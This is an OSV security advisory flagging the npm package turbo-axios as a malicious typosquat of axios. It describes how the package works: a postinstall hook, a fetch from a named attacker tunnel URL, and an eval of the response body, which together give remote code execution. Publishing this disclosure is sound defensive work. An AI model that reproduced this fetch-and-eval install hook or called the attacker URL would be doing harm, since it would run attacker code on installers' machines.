turbo-axios @1.17.3

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID

MAL-2026-4695

Ecosystem

npm

Summary

turbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) and carries an install-time remote code execution payload. package.json declares "postinstall": "node ./lib/core/eval.js". lib/core/eval.js calls fetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1') and then await eval(`(async () => {\n${datab2}\n})();`), executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick tunnel rather than the publisher's infrastructure, and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship different code to every installer at any time. The exfil/RCE function is misleadingly named sendAnalytics. Any npm install turbo-axios results in attacker-controlled code execution on the installer's machine with the privileges of the npm process, because postinstall hooks run automatically unless scripts are disabled.

Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)
